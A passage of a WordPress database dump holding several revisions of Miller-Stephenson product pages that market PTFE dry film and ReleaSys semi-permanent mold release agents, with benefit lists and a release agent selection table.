PTFE Dry Film Mold Release Agents generate a dry film on the mold surface, which is chemical inert, non-migrating and non-staining.  Formulations for this class of mold release agent can be solvent or water-based and application is typically performed with brushing or aerosolization. Once the solvent is dried, the release coating is ready for operation, no additional cure time is needed. PTFE dry film release agents are particularly useful in rubber-to-metal bonding operations or when molding silicone or fluorosilicone polymers and elastomers. Customers have found invaluable utility in utilizing Miller-Stephenson PTFE for electronic resin potting and casting operations.  PTFE, in general  has exceptional utility and can be use in compression and transfer molding operations, however due to its relatively low slip, it can be ineffective with injection molding operations.  Production engineers will typically choose PTFE-based release agents if they are looking for a non-silicone, chemical inert, and non-transferable release agent that is applicable across a broad range of substrates.  PTFE, on a release per application basis is significantly more efficient and cost-effective than sacrificial or PVA alternatives.  Miller-Stephenson’s <span style="font-size: 105%;"><strong style="font-size: 14.4px;"><a href="https://www.miller-stephenson.com/chemicals/release-agents/ptfe-release-agents/">MS-122AV and MS-122SE</a></strong></span><span style="font-size: 14.4px;"> a</span>re formulations which increase the durability and cost-effectiveness even further by addition of proprietary surface activation chemistry. To learn more about our mold release agents please <span style="font-size: 100%;"><strong><a href="https://www.miller-stephenson.com/chemicals/release-agents/">click here.</a></strong></span>\r\n<h3>Technical or Application Support:</h3>\r\n<ul>\r\n 	<li><a href="https://www.miller-stephenson.com/mold-release-application-guide/"><strong>For any questions about proper application of our mold release products please view our article which discusses this process</strong></a></li>\r\n 	<li><strong><a href="https://www.miller-stephenson.com/tech-support/">If you require any further technical or application support please contact our technical staff</a></strong></li>\r\n</ul>\r\n&nbsp;', 'PTFE Dry Film Mold Release Agents', '', 'inherit', 'closed', 'closed', '', '3015-revision-v1', '', '', '2016-12-22 16:48:43', '2016-12-22 16:48:43', '', 3015, 'https://www.miller-stephenson.com/3015-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (3336, 2, '2016-12-22 16:49:17', '2016-12-22 16:49:17', '<h3 style="text-align: center;">[share title=""]</h3>\r\n<h1 style="text-align: center;">PTFE Dry Film Mold Release Agents</h1>\r\n<h1 style="text-align: center;">Optimized surface adhesion; No Post-Molding cleaning</h1>\r\nPTFE (polytetrafluoroethylene) is a robust fluoropolymer which exhibits excellent chemical and thermal stability, high lubricity, low coefficient of friction, and functions as a premier mold release agent. Miller-Stephenson takes the application of PTFE Dry Film Mold Release Agents a step-further and utilizes a proprietary ultra-low molecular weight PTFE polymer to yield unsurpassed adhesion to mold surfaces, maximizing durability while minimizing coefficient of friction and transfer.   These attributes translate to the virtual elimination of mold part distortion - an extremely important criterion in precision molding. Our PTFE dry film release agents are not only ideal for mold release applications but also for dry lubricant operations. Benefits of Miller-Stephenson PTFE Dry Film Release agents:\r\n<ul>\r\n 	<li>Unparalleled release agent durability and surface adhesion</li>\r\n 	<li>No Transfer- Requires minimal post-molding cleaning</li>\r\n 	<li>Ideal for Rubber-to-Metal Bonding; Silicone molding</li>\r\n 	<li>Ideal for Compression / Transfer molding, Resin Casting and Potting;</li>\r\n 	<li>Excels at difficult mold geometries</li>\r\n 	<li>Stable up to 580 F / 304 C</li>\r\n 	<li>Non-migrating; Non-staining</li>\r\n 	<li>100% Non-flammable; Low VOC and GWP</li>\r\n</ul>\r\nIn comparison to typical release agents such as waxes and silicone oil-based release agents, PTFE minimize the need for post molding cleaning, allowing ancillary processes such as painting, adhesives, etc to be done immediately. These post-molding processes are often not directly compatible with the use of a silicone or wax-based release agents. If the release agent contains free silicone, then painting or gluing the component directly after molding will not be possible because silicone residue that remains on the component does not allow paint or adhesives to bond with the component.  Free Silicone-based release agents will cause the surface of parts to seem oily or will "stain" the molded part. Silicone is difficult to remove from various material surfaces once it has become integrated into the mold part, and typically the part will scraped. The risk of operation contamination is also very high and free silicone can shut down a manufacturing paint shop fairly easily, causing production delays and incurring significant expense.Miller-Stephenson has developed a robust portfolio of PTFE Dry Film release agents which circumvent all the drawbacks of silicone oil and wax-based release agents, while also increasing the application efficiency and cost-effectiveness. The use of silicone-free release agents allows for the removal of costly and time consuming cleaning steps and cross-contamination risk in the manufacturing process of many components, thus increasing productivity and lowering operational costs.\r\n\r\n[caption id="attachment_3028" align="alignleft" width="300"]<img class="wp-image-3028" src="https://www.miller-stephenson.com/wp-content/uploads/2016/11/shutterstock_360561536-800x534.jpg" alt="PTFE DryFilm Release Agent" width="300" height="200" /> <strong><a href="https://www.miller-stephenson.com/chemicals/release-agents/ptfe-release-agents/">MS-122SE</a> is ideal for rubber-to-metal operations such as used on cockpit seals</strong>[/caption]\r\n\r\nOur PTFE Dry Film Mold Release Agents generate a dry film on the mold surface, which is chemical inert, non-migrating and non-staining.  Formulations for this class of mold release agent can be solvent or water-based and application is typically performed with brushing or aerosolization. Once the solvent is dried, the release coating is ready for operation, no additional cure time is needed. PTFE dry film release agents are particularly useful in rubber-to-metal bonding operations or when molding silicone or fluorosilicone polymers and elastomers. Customers have found invaluable utility in utilizing Miller-Stephenson PTFE for electronic resin potting and casting operations.  PTFE, in general  has exceptional utility and can be use in compression and transfer molding operations, however due to its relatively low slip, it can be ineffective with injection molding operations.  Production engineers will typically choose PTFE-based release agents if they are looking for a non-silicone, chemical inert, and non-transferable release agent that is applicable across a broad range of substrates.  PTFE, on a release per application basis is significantly more efficient and cost-effective than sacrificial or PVA alternatives.  Miller-Stephenson’s <span style="font-size: 105%;"><strong style="font-size: 14.4px;"><a href="https://www.miller-stephenson.com/chemicals/release-agents/ptfe-release-agents/">MS-122AV and MS-122SE</a></strong></span><span style="font-size: 14.4px;"> a</span>re formulations which increase the durability and cost-effectiveness even further by addition of proprietary surface activation chemistry. To learn more about our mold release agents please <span style="font-size: 100%;"><strong><a href="https://www.miller-stephenson.com/chemicals/release-agents/">click here.</a></strong></span>\r\n<h3>Technical or Application Support:</h3>\r\n<ul>\r\n 	<li><a href="https://www.miller-stephenson.com/mold-release-application-guide/"><strong>For any questions about proper application of our mold release products please view our article which discusses this process</strong></a></li>\r\n 	<li><strong><a href="https://www.miller-stephenson.com/tech-support/">If you require any further technical or application support please contact our technical staff</a></strong></li>\r\n</ul>\r\n[follow twitter="https://twitter.com/MSChemicals" facebook="https://www.facebook.com/Miller-Stephenson-Chemical-Co-1158843970871033/" googleplus="https://plus.google.com/105252144916647489581" linkedin="https://www.linkedin.com/company/miller-stephenson-chemical-company"]', 'PTFE Dry Film Mold Release Agents', '', 'inherit', 'closed', 'closed', '', '3015-revision-v1', '', '', '2016-12-22 16:49:17', '2016-12-22 16:49:17', '', 3015, 'https://www.miller-stephenson.com/3015-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (3337, 2, '2016-12-22 16:50:00', '2016-12-22 16:50:00', '<h3 style="text-align: center;">[share title=""]</h3>\r\n<h1 style="text-align: center;">PTFE Dry Film Mold Release Agents</h1>\r\n<h1 style="text-align: center;">Optimized surface adhesion; No Post-Molding cleaning</h1>\r\nPTFE (polytetrafluoroethylene) is a robust fluoropolymer which exhibits excellent chemical and thermal stability, high lubricity, low coefficient of friction, and functions as a premier mold release agent. Miller-Stephenson takes the application of PTFE Dry Film Mold Release Agents a step-further and utilizes a proprietary ultra-low molecular weight PTFE polymer to yield unsurpassed adhesion to mold surfaces, maximizing durability while minimizing coefficient of friction and transfer.   These attributes translate to the virtual elimination of mold part distortion - an extremely important criterion in precision molding. Our PTFE dry film release agents are not only ideal for mold release applications but also for dry lubricant operations. Benefits of Miller-Stephenson PTFE Dry Film Release agents:\r\n<ul>\r\n 	<li>Unparalleled release agent durability and surface adhesion</li>\r\n 	<li>No Transfer- Requires minimal post-molding cleaning</li>\r\n 	<li>Ideal for Rubber-to-Metal Bonding; Silicone molding</li>\r\n 	<li>Ideal for Compression / Transfer molding, Resin Casting and Potting;</li>\r\n 	<li>Excels at difficult mold geometries</li>\r\n 	<li>Stable up to 580 F / 304 C</li>\r\n 	<li>Non-migrating; Non-staining</li>\r\n 	<li>100% Non-flammable; Low VOC and GWP</li>\r\n</ul>\r\nIn comparison to typical release agents such as waxes and silicone oil-based release agents, PTFE minimize the need for post molding cleaning, allowing ancillary processes such as painting, adhesives, etc to be done immediately. These post-molding processes are often not directly compatible with the use of a silicone or wax-based release agents. If the release agent contains free silicone, then painting or gluing the component directly after molding will not be possible because silicone residue that remains on the component does not allow paint or adhesives to bond with the component.  Free Silicone-based release agents will cause the surface of parts to seem oily or will "stain" the molded part. Silicone is difficult to remove from various material surfaces once it has become integrated into the mold part, and typically the part will scraped. The risk of operation contamination is also very high and free silicone can shut down a manufacturing paint shop fairly easily, causing production delays and incurring significant expense.Miller-Stephenson has developed a robust portfolio of PTFE Dry Film release agents which circumvent all the drawbacks of silicone oil and wax-based release agents, while also increasing the application efficiency and cost-effectiveness. The use of silicone-free release agents allows for the removal of costly and time consuming cleaning steps and cross-contamination risk in the manufacturing process of many components, thus increasing productivity and lowering operational costs.\r\n\r\n[caption id="attachment_3028" align="alignleft" width="300"]<img class="wp-image-3028" src="https://www.miller-stephenson.com/wp-content/uploads/2016/11/shutterstock_360561536-800x534.jpg" alt="PTFE DryFilm Release Agent" width="300" height="200" /> <strong><a href="https://www.miller-stephenson.com/chemicals/release-agents/ptfe-release-agents/">MS-122SE</a> is ideal for rubber-to-metal operations such as used on cockpit seals</strong>[/caption]\r\n\r\nOur PTFE Dry Film Mold Release Agents generate a dry film on the mold surface, which is chemical inert, non-migrating and non-staining.  Formulations for this class of mold release agent can be solvent or water-based and application is typically performed with brushing or aerosolization. Once the solvent is dried, the release coating is ready for operation, no additional cure time is needed. PTFE dry film release agents are particularly useful in rubber-to-metal bonding operations or when molding silicone or fluorosilicone polymers and elastomers. Customers have found invaluable utility in utilizing Miller-Stephenson PTFE for electronic resin potting and casting operations.  PTFE, in general  has exceptional utility and can be use in compression and transfer molding operations, however due to its relatively low slip, it can be ineffective with injection molding operations.  Production engineers will typically choose PTFE-based release agents if they are looking for a non-silicone, chemical inert, and non-transferable release agent that is applicable across a broad range of substrates.  PTFE, on a release per application basis is significantly more efficient and cost-effective than sacrificial or PVA alternatives.  Miller-Stephenson’s <span style="font-size: 105%;"><strong style="font-size: 14.4px;"><a href="https://www.miller-stephenson.com/chemicals/release-agents/ptfe-release-agents/">MS-122AV and MS-122SE</a></strong></span><span style="font-size: 14.4px;"> a</span>re formulations which increase the durability and cost-effectiveness even further by addition of proprietary surface activation chemistry. To learn more about our mold release agents please <span style="font-size: 100%;"><strong><a href="https://www.miller-stephenson.com/chemicals/release-agents/">click here.</a></strong></span>\r\n<h3>Technical or Application Support:</h3>\r\n<ul>\r\n 	<li><a href="https://www.miller-stephenson.com/mold-release-application-guide/"><strong>For any questions about proper application of our mold release products please view our article which discusses this process</strong></a></li>\r\n 	<li><strong><a href="https://www.miller-stephenson.com/tech-support/">If you require any further technical or application support please contact our technical staff</a></strong></li>\r\n</ul>\r\n<p style="text-align: center;">[follow twitter="https://twitter.com/MSChemicals" facebook="https://www.facebook.com/Miller-Stephenson-Chemical-Co-1158843970871033/" googleplus="https://plus.google.com/105252144916647489581" linkedin="https://www.linkedin.com/company/miller-stephenson-chemical-company"]</p>', 'PTFE Dry Film Mold Release Agents', '', 'inherit', 'closed', 'closed', '', '3015-revision-v1', '', '', '2016-12-22 16:50:00', '2016-12-22 16:50:00', '', 3015, 'https://www.miller-stephenson.com/3015-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (3338, 2, '2016-12-22 16:51:22', '2016-12-22 16:51:22', '<h3 style="text-align: center;">[share title=""]</h3>\r\n<h1>Composite Mold Release Agents - ReleaSys™</h1>\r\nMiller-Stephenson Composite mold release agents are backed by over 40 years of technical experience and are trusted to deliver the most consistent release of composite material in the industry. Our formulations are uniquely tailored to yield unmatched utility and efficient for the robust and constantly evolving composite industry. These wax- and silicone-free release agents crosslink to create a low surface energy film which exhibits high slip, superior durability, chemical resistance, and thermally stable. Large and small manufacturers can expect higher productivity and profitability through reduced downtime, increased acceptance rates and improved part quality when switching to<strong> <a href="https://www.miller-stephenson.com/chemicals/mold-release-agents/semi-permanent-release-agents/">Miller-Stephenson’s ReleaSys semi-permanent line</a> </strong>or<strong> <a href="https://www.miller-stephenson.com/chemicals/mold-release-agents/ptfe-release-agents/">PTFE Dry Flim Release Agents</a>.</strong> With our composite mold release agents operators will see minimal transfer to molded components, low clogging, easy application and the highest number of releases possible per application <em>guaranteed. </em>As a leader in the development of water-based products, Miller-Stephenson offers environmentally conscious technology for composite molders who require the same, uncompromised high levels of quality and performance as found in traditional solvent-based products. Benefits of utilizing our mold release agents include:\r\n<ul>\r\n 	<li>Low or No volatile organic compounds (VOC)</li>\r\n 	<li>Minimal odor; 100% Non-flammable formulations</li>\r\n 	<li>Semi-permanent mold release bonds to mold surface for consistent release</li>\r\n 	<li>Higher productivity; Increased cost-effectiveness</li>\r\n 	<li>Low rejection rate; Consistent part quality</li>\r\n</ul>\r\nMiller-Stephenson composite <a href="https://www.miller-stephenson.com/chemicals/mold-release-agents/">mold release agents</a> have been optimized to cover industry applications from Fiber Reinforced Plastic (FRP) to advanced composites and from aerospace applications to automotive, construction, marine, recreational/sporting goods, wind energy and more. Both ReleaSys and our PTFE Dry Film release agents will provide exceptional utility, improving molding processes such as vacuum bagging, resin infusion, layup and etc. Our products are applicable in all manufacturing process such as:\r\n<ul>\r\n 	<li>Thermoset Epoxies, Phenolics, and BMIs</li>\r\n 	<li>Thermoset Prepregs</li>\r\n 	<li>Potting and Casting Resins</li>\r\n 	<li>Hand lay-ups</li>\r\n 	<li>Filament Winding</li>\r\n 	<li>Autoclave molding</li>\r\n 	<li>Vacuum bag molding</li>\r\n 	<li>Resin transfer molding</li>\r\n 	<li>Resin film infusion</li>\r\n 	<li>Compression, Transfer, Injection Molding</li>\r\n 	<li>Rotational Molding</li>\r\n 	<li>Metallic, Ceramic, and Composite Tooling</li>\r\n</ul>\r\n<h3>Advantages of Utilizing Miller-Stephenson Composite Mold Release Agents</h3>\r\nMiller-Stephenson combines great technical and industry knowledge with a hands-on approach to service and support to address the challenges faced by our customers in their composite molding operations. Beyond the basics of releasing finished parts from their molds, utilizing our robust portfolio of ReleaSys semi-permanents mold release agents and PTFE Dry Film release agents, along with our industry leading support network, brings significant operational benefits.\r\n<ul>\r\n 	<li>Water-based options for reducing environmental impact and improving facility HSE</li>\r\n 	<li>Flexibility to accommodate a wide range of process conditions</li>\r\n 	<li>A global network of support experts to work with you to eliminate bottlenecks and improve process flow</li>\r\n 	<li>Cost-effective, high durability, and consistent mold release</li>\r\n 	<li>Reduced downtime and scrap rates</li>\r\n 	<li>Minimal mold fouling and transfer</li>\r\n</ul>\r\n<h2><strong>Release Agent Selection Guide:</strong></h2>\r\n<table width="751">\r\n<tbody>\r\n<tr>\r\n<td style="text-align: center;" width="122">\r\n<h3><span style="text-decoration: underline;"><span style="color: #0000ff; text-decoration: underline;" data-text-color="primary"><strong><span style="font-size: 100%;">Product Type</span></strong></span></span></h3>\r\n</td>\r\n<td style="text-align: center;" width="122">\r\n<h3><span style="text-decoration: underline;"><span style="color: #0000ff; text-decoration: underline;" data-text-color="primary"><strong><span style="font-size: 100%;">Application</span></strong></span></span></h3>\r\n</td>\r\n<td style="text-align: center;" width="153">\r\n<h3><span style="text-decoration: underline;"><span style="color: #0000ff; text-decoration: underline;" data-text-color="primary"><strong><span style="font-size: 100%;">Finish</span></strong></span></span></h3>\r\n</td>\r\n<td style="text-align: center;" width="151">\r\n<h3><span style="text-decoration: underline;"><span style="color: #0000ff; text-decoration: underline;" data-text-color="primary"><strong><span style="font-size: 100%;">Product</span></strong></span></span></h3>\r\n</td>\r\n<td style="text-align: center;" width="203">\r\n<h3><span style="text-decoration: underline;"><span style="color: #0000ff; text-decoration: underline;" data-text-color="primary"><strong><span style="font-size: 100%;">Description</span></strong></span></span></h3>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3" width="122">Solvent / Semi-Permanent</td>\r\n<td style="text-align: center;" rowspan="3" width="122">Compression Molding, Casting, Vacuum Bagging</td>\r\n<td style="text-align: center;" rowspan="3">Matte-Satin</td>\r\n<td style="text-align: center;" rowspan="3"><strong><a href="https://www.miller-stephenson.com/product/semi-permanent-mold-release-agents/"><span style="font-size: 110%;">ReleaSys 8900</span></a></strong></td>\r\n<td style="text-align: center;">Highest Slip</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">Minimal transfer; No Build up</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">Fast Cure (3-5min @ 50 °C)</td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3" width="122">Water-Based / Semi-Permanent</td>\r\n<td style="text-align: center;" rowspan="3" width="122">Compression Molding, Casting, Vacuum Bagging</td>\r\n<td style="text-align: center;" rowspan="3">Matte</td>\r\n<td style="text-align: center;" rowspan="3"><strong><a href="https://www.miller-stephenson.com/product/rubber-molding-release-agent/"><span style="font-size: 110%;">ReleaSys 8500</span></a></strong></td>\r\n<td style="text-align: center;">Medium  Slip</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">No transfer; No Build up</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">Instant Cure</td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="4" width="122">Solvent /PTFE Dry Film</td>\r\n<td style="text-align: center;" rowspan="4" width="122">Resin Potting and Casting</td>\r\n<td style="text-align: center;" rowspan="4">Matte-Dry</td>\r\n<td style="text-align: center;" rowspan="4"><span style="font-size: 110%;"><strong><a href="https://www.miller-stephenson.com/product/ptfe-release-agent/">MS-122AV</a></strong> or <strong><a href="https://www.miller-stephenson.com/product/ptfe-mold-release-agents/">MS-143TE</a></strong></span></td>\r\n<td style="text-align: center;">PTFE Dry Film</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">No transfer</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">Minimal Rejection Rate</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">High Durability</td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3" width="122">Water-Based / Semi-Permanent</td>\r\n<td style="text-align: center;" rowspan="3">High Slip</td>\r\n<td style="text-align: center;" rowspan="3">Matte</td>\r\n<td style="text-align: center;" rowspan="3"><strong><a href="https://www.miller-stephenson.com/product/composite-mold-release-agent/"><span style="font-size: 110%;">ReleaSys 8800</span></a></strong></td>\r\n<td style="text-align: center;">Instant Cure</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">Minimal transfer</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">High Durability; High Slip</td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3" width="122">Solvent / Semi-Permanent</td>\r\n<td style="text-align: center;" rowspan="3" width="122">Filament Winding</td>\r\n<td style="text-align: center;" rowspan="3">Matte-Satin</td>\r\n<td style="text-align: center;" rowspan="3"><strong><a href="https://www.miller-stephenson.com/product/semi-permanent-mold-release-agents/"><span style="font-size: 110%;">ReleaSys 8900</span></a></strong></td>\r\n<td style="text-align: center;">Highest Slip</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">Minimal transfer; No Build up</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">Fast Cure (3-5min @ 50 °C)</td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3" width="122">Solvent / Semi-Permanent</td>\r\n<td style="text-align: center;" rowspan="3" width="122">High Performance Composites</td>\r\n<td style="text-align: center;" rowspan="3">Matte-Satin</td>\r\n<td style="text-align: center;" rowspan="3"><strong><a href="https://www.miller-stephenson.com/product/semi-permanent-mold-release-agents/"><span style="font-size: 110%;">ReleaSys 8900</span></a></strong></td>\r\n<td style="text-align: center;">Highest Slip</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">Minimal transfer; No Build up</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">Fast Cure (3-5min @ 50 °C)</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h3>Technical or Application Support:</h3>\r\n<ul>\r\n 	<li><a href="https://www.miller-stephenson.com/mold-release-application-guide/"><strong>For any questions about proper application of our mold release products please view our article which discusses this process</strong></a></li>\r\n 	<li><strong><a href="https://www.miller-stephenson.com/tech-support/">If you require any further technical or application support please contact our technical staff</a></strong></li>\r\n</ul>\r\n[ux_product_categories ids="21,16" number="10"]\r\n\r\n&nbsp;', 'Composite Mold Release Agents | ReleaSys™', '', 'inherit', 'closed', 'closed', '', '2936-revision-v1', '', '', '2016-12-22 16:51:22', '2016-12-22 16:51:22', '', 2936, 'https://www.miller-stephenson.com/2936-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (3339, 2, '2016-12-22 16:51:46', '2016-12-22 16:51:46', '<h3 style="text-align: center;">[share title=""]</h3>\r\n<h1>Composite Mold Release Agents - ReleaSys™</h1>\r\nMiller-Stephenson Composite mold release agents are backed by over 40 years of technical experience and are trusted to deliver the most consistent release of composite material in the industry. Our formulations are uniquely tailored to yield unmatched utility and efficient for the robust and constantly evolving composite industry. These wax- and silicone-free release agents crosslink to create a low surface energy film which exhibits high slip, superior durability, chemical resistance, and thermally stable. Large and small manufacturers can expect higher productivity and profitability through reduced downtime, increased acceptance rates and improved part quality when switching to<strong> <a href="https://www.miller-stephenson.com/chemicals/mold-release-agents/semi-permanent-release-agents/">Miller-Stephenson’s ReleaSys semi-permanent line</a> </strong>or<strong> <a href="https://www.miller-stephenson.com/chemicals/mold-release-agents/ptfe-release-agents/">PTFE Dry Flim Release Agents</a>.</strong> With our composite mold release agents operators will see minimal transfer to molded components, low clogging, easy application and the highest number of releases possible per application <em>guaranteed. </em>As a leader in the development of water-based products, Miller-Stephenson offers environmentally conscious technology for composite molders who require the same, uncompromised high levels of quality and performance as found in traditional solvent-based products. Benefits of utilizing our mold release agents include:\r\n<ul>\r\n 	<li>Low or No volatile organic compounds (VOC)</li>\r\n 	<li>Minimal odor; 100% Non-flammable formulations</li>\r\n 	<li>Semi-permanent mold release bonds to mold surface for consistent release</li>\r\n 	<li>Higher productivity; Increased cost-effectiveness</li>\r\n 	<li>Low rejection rate; Consistent part quality</li>\r\n</ul>\r\nMiller-Stephenson composite <a href="https://www.miller-stephenson.com/chemicals/mold-release-agents/">mold release agents</a> have been optimized to cover industry applications from Fiber Reinforced Plastic (FRP) to advanced composites and from aerospace applications to automotive, construction, marine, recreational/sporting goods, wind energy and more. Both ReleaSys and our PTFE Dry Film release agents will provide exceptional utility, improving molding processes such as vacuum bagging, resin infusion, layup and etc. Our products are applicable in all manufacturing process such as:\r\n<ul>\r\n 	<li>Thermoset Epoxies, Phenolics, and BMIs</li>\r\n 	<li>Thermoset Prepregs</li>\r\n 	<li>Potting and Casting Resins</li>\r\n 	<li>Hand lay-ups</li>\r\n 	<li>Filament Winding</li>\r\n 	<li>Autoclave molding</li>\r\n 	<li>Vacuum bag molding</li>\r\n 	<li>Resin transfer molding</li>\r\n 	<li>Resin film infusion</li>\r\n 	<li>Compression, Transfer, Injection Molding</li>\r\n 	<li>Rotational Molding</li>\r\n 	<li>Metallic, Ceramic, and Composite Tooling</li>\r\n</ul>\r\n<h3>Advantages of Utilizing Miller-Stephenson Composite Mold Release Agents</h3>\r\nMiller-Stephenson combines great technical and industry knowledge with a hands-on approach to service and support to address the challenges faced by our customers in their composite molding operations. Beyond the basics of releasing finished parts from their molds, utilizing our robust portfolio of ReleaSys semi-permanents mold release agents and PTFE Dry Film release agents, along with our industry leading support network, brings significant operational benefits.\r\n<ul>\r\n 	<li>Water-based options for reducing environmental impact and improving facility HSE</li>\r\n 	<li>Flexibility to accommodate a wide range of process conditions</li>\r\n 	<li>A global network of support experts to work with you to eliminate bottlenecks and improve process flow</li>\r\n 	<li>Cost-effective, high durability, and consistent mold release</li>\r\n 	<li>Reduced downtime and scrap rates</li>\r\n 	<li>Minimal mold fouling and transfer</li>\r\n</ul>\r\n<h2><strong>Release Agent Selection Guide:</strong></h2>\r\n<table width="751">\r\n<tbody>\r\n<tr>\r\n<td style="text-align: center;" width="122">\r\n<h3><span style="text-decoration: underline;"><span style="color: #0000ff; text-decoration: underline;" data-text-color="primary"><strong><span style="font-size: 100%;">Product Type</span></strong></span></span></h3>\r\n</td>\r\n<td style="text-align: center;" width="122">\r\n<h3><span style="text-decoration: underline;"><span style="color: #0000ff; text-decoration: underline;" data-text-color="primary"><strong><span style="font-size: 100%;">Application</span></strong></span></span></h3>\r\n</td>\r\n<td style="text-align: center;" width="153">\r\n<h3><span style="text-decoration: underline;"><span style="color: #0000ff; text-decoration: underline;" data-text-color="primary"><strong><span style="font-size: 100%;">Finish</span></strong></span></span></h3>\r\n</td>\r\n<td style="text-align: center;" width="151">\r\n<h3><span style="text-decoration: underline;"><span style="color: #0000ff; text-decoration: underline;" data-text-color="primary"><strong><span style="font-size: 100%;">Product</span></strong></span></span></h3>\r\n</td>\r\n<td style="text-align: center;" width="203">\r\n<h3><span style="text-decoration: underline;"><span style="color: #0000ff; text-decoration: underline;" data-text-color="primary"><strong><span style="font-size: 100%;">Description</span></strong></span></span></h3>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3" width="122">Solvent / Semi-Permanent</td>\r\n<td style="text-align: center;" rowspan="3" width="122">Compression Molding, Casting, Vacuum Bagging</td>\r\n<td style="text-align: center;" rowspan="3">Matte-Satin</td>\r\n<td style="text-align: center;" rowspan="3"><strong><a href="https://www.miller-stephenson.com/product/semi-permanent-mold-release-agents/"><span style="font-size: 110%;">ReleaSys 8900</span></a></strong></td>\r\n<td style="text-align: center;">Highest Slip</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">Minimal transfer; No Build up</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">Fast Cure (3-5min @ 50 °C)</td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3" width="122">Water-Based / Semi-Permanent</td>\r\n<td style="text-align: center;" rowspan="3" width="122">Compression Molding, Casting, Vacuum Bagging</td>\r\n<td style="text-align: center;" rowspan="3">Matte</td>\r\n<td style="text-align: center;" rowspan="3"><strong><a href="https://www.miller-stephenson.com/product/rubber-molding-release-agent/"><span style="font-size: 110%;">ReleaSys 8500</span></a></strong></td>\r\n<td style="text-align: center;">Medium  Slip</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">No transfer; No Build up</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">Instant Cure</td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="4" width="122">Solvent /PTFE Dry Film</td>\r\n<td style="text-align: center;" rowspan="4" width="122">Resin Potting and Casting</td>\r\n<td style="text-align: center;" rowspan="4">Matte-Dry</td>\r\n<td style="text-align: center;" rowspan="4"><span style="font-size: 110%;"><strong><a href="https://www.miller-stephenson.com/product/ptfe-release-agent/">MS-122AV</a></strong> or <strong><a href="https://www.miller-stephenson.com/product/ptfe-mold-release-agents/">MS-143TE</a></strong></span></td>\r\n<td style="text-align: center;">PTFE Dry Film</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">No transfer</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">Minimal Rejection Rate</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">High Durability</td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3" width="122">Water-Based / Semi-Permanent</td>\r\n<td style="text-align: center;" rowspan="3">High Slip</td>\r\n<td style="text-align: center;" rowspan="3">Matte</td>\r\n<td style="text-align: center;" rowspan="3"><strong><a href="https://www.miller-stephenson.com/product/composite-mold-release-agent/"><span style="font-size: 110%;">ReleaSys 8800</span></a></strong></td>\r\n<td style="text-align: center;">Instant Cure</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">Minimal transfer</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">High Durability; High Slip</td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3" width="122">Solvent / Semi-Permanent</td>\r\n<td style="text-align: center;" rowspan="3" width="122">Filament Winding</td>\r\n<td style="text-align: center;" rowspan="3">Matte-Satin</td>\r\n<td style="text-align: center;" rowspan="3"><strong><a href="https://www.miller-stephenson.com/product/semi-permanent-mold-release-agents/"><span style="font-size: 110%;">ReleaSys 8900</span></a></strong></td>\r\n<td style="text-align: center;">Highest Slip</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">Minimal transfer; No Build 